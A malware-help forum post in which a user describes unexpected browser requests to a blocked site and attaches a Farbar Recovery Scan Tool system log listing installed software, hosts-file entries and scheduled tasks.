
Log analysis and evaluation: Windows 8.1 + Firefox 38.0.1: Request to a malware-listed site when opening any website


27.05.2015, 11:01   #1
RAnders00
 



I noticed the following:
While I was in the Firefox (38.0.1) console, I noticed that after a website finished loading, an HTTP GET request was sent to a site that was blocked by Bitdefender Total Security 2015. This is roughly what it looks like (in this case I am opening the trustworthy site Wolfram|Alpha):


This "Dealdo" (it appears in the address) seems to be a dubious online erotica shop. (I only visited the Facebook page)

Here is a list of my Firefox add-ons and plugins: https://imgur.com/a/G8AbP

Addition.txt
Code:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-05-2015
Ran by Ruben at 2015-05-27 11:23:48
Running from C:\Users\Ruben\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2798130160-1945478871-1923780282-500 - Administrator - Disabled)
Gast (S-1-5-21-2798130160-1945478871-1923780282-501 - Limited - Disabled)
Ruben (S-1-5-21-2798130160-1945478871-1923780282-1001 - Administrator - Enabled) => C:\Users\Ruben

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\uTorrent) (Version: 3.4.2.39744 - BitTorrent Inc.)
7-Zip 9.38 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0938-000001000000}) (Version: 9.38.00.0 - Igor Pavlov)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Apple Application Support (32-Bit) (HKLM-x32\...\{447CDCE5-F555-429B-BFA6-642C3C6D684F}) (Version: 3.1.2 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{0DF7096B-715A-4233-8633-C7A16ED6D616}) (Version: 3.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.3.757 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 18.21.0.1497 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Curse (HKLM-x32\...\{1F2611FB-6F69-4AA8-BECD-243BD8CB45F3}) (Version: 6.0.0.0 - Curse)
DB Browser for SQLite (HKLM-x32\...\SqliteBrowser3) (Version: 3.5.1 - oldsch00l)
DisplayFusion 7.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 7.1.0.0 - Binary Fortress Software)
Dropbox (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\Dropbox) (Version: 3.4.6 - Dropbox, Inc.)
Druckerdeinstallation für EPSON PX710W Series (HKLM\...\EPSON PX710W Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
FDUx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
FileZilla Client 3.11.0.1 (HKLM-x32\...\FileZilla Client) (Version: 3.11.0.1 - Tim Kosse)
Finale 2014d DEMO (HKLM-x32\...\Finale 2014) (Version: 2014.4.5030.2 - MakeMusic)
Finale NotePad 2012 (HKLM-x32\...\Finale NotePad 2012) (Version: 2012..r1.1 - MakeMusic)
Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.4.96.511 - Foxit Software Inc.)
Foxit PhantomPDF Standard (HKLM-x32\...\{365A8436-22A8-47BF-B1B9-6A6CDAA465CE}) (Version: 7.0.8.1216 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.0.8.1216 - Foxit Software Inc.)
Genymotion version 2.4.0 (HKLM\...\{6D180286-D4DF-40EF-9227-923B9C07C08A}_is1) (Version: 2.4.0 - Genymobile)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Git version 1.9.5-preview20150319 (HKLM-x32\...\Git_is1) (Version: 1.9.5-preview20150319 - The Git Development Community)
HexChat (HKLM\...\HexChat_is1) (Version: 2.10.2 - HexChat)
iExplorer 3.7.3.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
IntelliJ IDEA Community Edition 14.1.3 (HKLM-x32\...\IntelliJ IDEA Community Edition 14.1.3) (Version: 141.1010.3 - JetBrains s.r.o.)
iTunes (HKLM\...\{D227565A-0033-40AD-89BA-653A205CDC11}) (Version: 12.1.1.4 - Apple Inc.)
Java SE Development Kit 8 Update 45 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180450}) (Version: 8.0.450.14 - Oracle Corporation)
JetBrains PhpStorm 8.0.3 (HKLM-x32\...\PhpStorm 8.0.3) (Version: 139.1348 - JetBrains s.r.o.)
Jitsi (HKLM-x32\...\{DBA37B35-10E9-484D-8AF6-2BB1FC734590}) (Version: 2.8.5426 - Jitsi)
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.)
Macrium Reflect Free Edition (Version: 5.3.7290 - Paramount Software (UK) Ltd.) Hidden
Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version:  - Mathias Kunter)
MediaMonkey 4.1 (HKLM-x32\...\MediaMonkey_is1) (Version: 4.1 - Ventis Media Inc.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - de-de (HKLM\...\ProPlusRetail - de-de) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\OneDriveSetup.exe) (Version: 17.3.5860.0512 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 38.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 38.0.1 (x86 de)) (Version: 38.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 36.0.4 - Mozilla)
Networkx64 (Version: 1.0.0 - Sony Corporation) Hidden
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.7.8.2 - Notepad++ Team)
NVIDIA 3D Vision Treiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 352.86 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.3.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.31 - NVIDIA Corporation)
NVIDIA Grafiktreiber 352.86 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 352.86 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Oracle VM VirtualBox 4.3.26 (HKLM\...\{5771F59A-BFC9-4FAF-A883-7642EF4BA3C3}) (Version: 4.3.26 - Oracle Corporation)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.1.0 - pdfforge)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6695 - Realtek Semiconductor Corp.)
Restore (x32 Version: 1.0.0 - Sony Corporation) Hidden
SCS Shortcut (x32 Version: 1.0 - Sony Creative Software Inc.) Hidden
ShareX 9.10.1 (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 9.10.1 - ShareX Developers)
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.3.31 - NVIDIA Corporation) Hidden
Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.)
SSLx64 (Version: 1.0.0 - Sony Corporation ) Hidden
SSLx86 (x32 Version: 1.0.0 - Sony Corporation ) Hidden
Start Menu 8 (HKLM-x32\...\IObit_StartMenu8_is1) (Version: 2.2.0 - IObit)
SuperD spd2900gs (HKLM-x32\...\{B4D7DF2F-5FD7-4908-A098-298CE9898A8D}) (Version: 1.0.2102.1004 - SuperD Co., Ltd.)
SuperD X-Tune (HKLM-x32\...\{2730EB73-8EEF-447F-82A0-16497631386A}) (Version: 1.0.2101.1003 - SuperD Co., Ltd.)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.41459 - TeamViewer)
Ultra Defragmenter (HKLM-x32\...\UltraDefrag) (Version: 6.0.4 - UltraDefrag Development Team)
VAIO Care (HKLM\...\{EF649526-0134-46A8-8DF3-D7F9309E48DB}) (Version: 8.4.2.12046 - Sony Corporation)
VAIO Care Recovery (HKLM\...\{15B9204E-BA09-485E-8F2C-094AC0077664}) (Version: 1.1.2.13230 - Sony Corporation)
VAIO Care-Hardwarediagnose-Plugin (HKLM-x32\...\{EC153498-00E1-4C9C-89BE-81527C6750BE}) (Version: 4.11.1.11220 - Sony Corporation)
VAIO Control Center (HKLM-x32\...\{8E797841-A110-41FD-B17A-3ABC0641187A}) (Version: 6.0.0.08280 - Sony Corporation)
VAIO Data Restore Tool (HKLM-x32\...\{57B955CE-B5D3-495D-AF1B-FAEE0540BFEF}) (Version: 1.10.0.07270 - Sony Corporation)
VAIO Easy Connect (x32 Version: 8.2.0.14170 - Sony Corporation) Hidden
VAIO Gesture Control (HKLM-x32\...\{692955F2-DE9F-4078-8FAA-858D6F3A1776}) (Version: 2.0.0.08240 - Sony Corporation)
VAIO Gesture Control (x32 Version: 2.0.0.08240 - Sony Corporation) Hidden
VAIO Improvement (HKLM-x32\...\{3A26D9BD-0F73-432D-B522-2BA18138F7EF}) (Version: 2.0.0.08090 - Sony Corporation)
VAIO Media Server Settings (HKLM\...\{62A172B2-550E-499D-9A82-5190D18390AA}) (Version: 1.0.2.11060 - Sony Corporation)
VAIO Update (HKLM-x32\...\{9FF95DA2-7DA1-4228-93B7-DED7EC02B6B2}) (Version: 7.0.1.02280 - Sony Corporation)
VAIO*CPU-Lüfterdiagnose (HKLM-x32\...\{BCE6E3D7-B565-4E1B-AC77-F780666A35FB}) (Version: 1.1.0.09200 - Sony Corporation)
VAIO-Handbuch (HKLM-x32\...\{C6E893E7-E5EA-4CD5-917C-5443E753FCBD}) (Version: 3.0.0.08100 - Sony Corporation)
VAIO-Support für Übertragungen (HKLM-x32\...\{5DDAFB4B-C52E-468A-9E23-3B0CEEB671BF}) (Version: 1.8.0.08212 - Sony Corporation)
VCCx64 (Version: 1.0.0 - Sony Corporation) Hidden
VCCx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VHD (x32 Version: 1.0.0 - Sony Corporation) Hidden
VIx64 (Version: 1.0.0 - Sony Corporation) Hidden
VIx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN)
VMLx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VPMx64 (Version: 1.0.0 - Sony Corporation ) Hidden
VSSTx64 (Version: 1.0.0 - Sony Corporation ) Hidden
VSSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
VU5x64 (Version: 1.1.0 - Sony Corporation ) Hidden
VU5x86 (x32 Version: 1.1.0 - Sony Corporation ) Hidden
VueScan x64 (HKLM\...\VueScan x64) (Version:  - )
VWSTx86 (x32 Version: 1.0.0 - Sony Corporation) Hidden
Wireshark 1.12.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.5 - The Wireshark developer community, hxxp://www.wireshark.org)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)
X-Lite (HKLM-x32\...\{8698D30E-8FFC-4BCD-A13A-3DAB86C0D42E}) (Version: 48.7.6464 - CounterPath Corporation)
XMedia Recode Version 3.2.2.4 (HKLM-x32\...\{DDA3C325-47B2-4730-9672-BF3771C08799}_is1) (Version: 3.2.2.4 - XMedia Recode)
X-Mouse Button Control 2.10.2 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.10.2 - Highresolution Enterprises)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{654a14c2-f1da-4026-b8f4-6e6dac64644c}\InprocServer32 -> C:\WINDOWS\system32\dfshim.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ca586c80-7c84-4b88-8537-726724df6929}\InprocServer32 -> C:\Program Files (x86)\Git\git-cheetah\git_shell_ext64.dll ()
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\17.3.5860.0512\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2798130160-1945478871-1923780282-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ruben\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)

==================== Restore Points =========================

13-05-2015 07:25:51 Windows Update
18-05-2015 12:03:04 Removed Java 8 Update 45
23-05-2015 18:10:19 Installed Jitsi

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2015-04-15 17:49 - 00001550 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1                   onhax.net
127.0.0.1                   www.onhax.net
127.0.0.1                   forum.onhax.net
127.0.0.1                   https://forum.onhax.net
127.0.0.1                   labs.onhax.net
127.0.0.1                   do2dear.net
127.0.0.1                   p30world.com
127.0.0.1                   brarstuff.com
127.0.0.1                   rsload.net
127.0.0.1                   bandicam.com
127.0.0.1                   ssl.bandisoft.com
127.0.0.1                   idm-crack-patch.blogspot.in
127.0.0.1                   parth8641.blogspot.com
127.0.0.1                   www.hamrick.com
127.0.0.1                   static.hamrick.com
127.0.0.1                   stats.hamrick.com


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03C91028-657D-4423-ACB7-5B756163654A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-05-14] (Microsoft Corporation)
Task: {0B28ACAA-4BDE-435A-82C4-3D97F02769E5} - System32\Tasks\Microsoft Office 15 Sync Maintenance for RubensVaio-Ruben RubensVaio => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2015-03-10] (Microsoft Corporation)
Task: {1E57804B-1ED4-4D5D-9106-B4AF2F176224} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update => C:\Program Files\Sony\VAIO Update\VAIOUpdt.exe [2014-02-28] (Sony Corporation)
Task: {20861EEF-3A03-42F4-A838-FDC40C7C9A12} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {24A595BD-D1B1-4EFA-A1E8-8CAECF20EB42} - System32\Tasks\USER_ESRV_SVC => Wscript.exe //B //NoLogo "C:\Program Files\Sony\VAIO Care\ESRV\task.vbs"
Task: {271304AE-4247-4B0B-85EA-0AC3419AB74D} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-05-19] (Adobe Systems Incorporated)
Task: {32CA79B8-D216-44F2-AEAB-903ADF0C94C8} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {3321A6D4-11EA-46DB-9302-9168FFCACFE3} - System32\Tasks\Sony Corporation\VAIO Care\VCCheckIolo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {355229AC-40E8-4FB5-B14C-47DDAE6BB1BF} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {4BBBB335-FA93-441D-B6C2-36D9AB317B37} - System32\Tasks\Sony Corporation\VAIO Care\VCMetrics => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {51D843BE-4E3A-4A98-985D-8C4CF538B8DD} - System32\Tasks\Sony Corporation\VAIO Care\UpdateSolution => C:\Program Files\Sony\VAIO Care\Solution.Updater.exe [2014-12-03] (Sony Corporation)
Task: {61130F71-8742-45D6-A4E1-FB637B1921F6} - System32\Tasks\Sony Corporation\VAIO Gesture Control\VCGULogonTask => C:\Program Files (x86)\Sony\VAIO Camera Gesture Utility\VCGU.exe [2012-08-04] (Sony Corporation)
Task: {6FE63A85-9C0B-4320-84A4-CD51083C79B6} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {765339AF-3C12-49A4-B1BC-933BD59B9334} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-24] (Microsoft Corporation)
Task: {77F73AB1-2BF9-4BAF-B6FD-9403F07EDAFA} - System32\Tasks\Sony Corporation\VAIO Control Center\NetworkSetting\NetworkSetting Logon Start => C:\Program Files (x86)\Sony\VAIO Control Center\NetworkSetting\NetworkClient
Task: {7A27FD2C-4200-4E77-B499-56228EAEDD03} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {8F0B6E2A-D772-4017-963D-4D2B18A70033} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorSystem => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation)
Task: {952CBAA9-3887-4259-BA73-862AF0AEF16D} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe
Task: {95B5A631-5805-4407-96E9-9C6776689825} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe [2012-08-09] (Sony Corporation)
Task: {A2EA898B-2E09-4C82-9C64-8EED1FF1DF6E} - System32\Tasks\Sony Corporation\VAIO Care\ActiveStatusCollect => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {A9781B7B-C893-443A-82EB-A9FDEE6000B3} - System32\Tasks\Sony Corporation\VAIO Care\DeployCRMflag => C:\Program Files\Sony\VAIO Care\DeployCRMflag.exe [2014-01-16] (Sony Corporation)
Task: {AB90CD73-64F5-45CA-93CD-9DB6BD1E1F1F} - System32\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {ACA7E4BC-9D11-4DAC-9C89-915E7E92ACD2} - System32\Tasks\Sony Corporation\VAIO Care\CheckSystemInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {BAD4621D-A636-4B10-9785-ABE52CB0FBF2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {C5081CD6-0561-4F2B-8689-285F9C321092} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2798130160-1945478871-1923780282-1001 => %localappdata%\Microsoft\OneDrive\OneDrive.exe
Task: {C74A71A1-C1F8-4912-A221-88E2A38C3007} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {CB31D35B-2569-4CAE-8356-147FCE026D6F} - System32\Tasks\Sony Corporation\VAIO Care\VCRLog => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {DDA0A5F1-6933-40B4-A7B0-F03F60881A3D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation)
Task: {DE6EAFBD-DD25-4EFC-B75F-3545323C2F47} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementMonitorUser => C:\Program Files\Sony\VAIO Improvement\vim.exe [2013-04-03] (Sony Corporation)
Task: {DF0C1261-3171-41F3-8E1D-9D4D045C9465} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe
Task: {DF9838E6-ABEF-45E6-82F6-7D9CC9B99852} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-03-27] (Microsoft Corporation)
Task: {E14B16FC-63D8-4C18-9CAC-39BA994EC36D} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update Self Repair => C:\Program Files\Sony\VAIO Update\VUSR.exe [2014-03-01] (Sony Corporation)
Task: {E434E6B4-C0FC-4238-B2A6-EB3A265CB241} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-24] (Microsoft Corporation)
Task: {EBDE38DB-C1AB-496A-89BE-F5AFC1FC3E17} - System32\Tasks\Sony Corporation\VAIO Care\GetPOTInfo => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {EFC29B24-98E1-43F2-A2B7-0AA3FD271A3D} - System32\Tasks\Sony Corporation\VAIO Care\UploadPOT => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: {F097C3CA-BC1A-4D8A-8D24-FBE34B061625} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
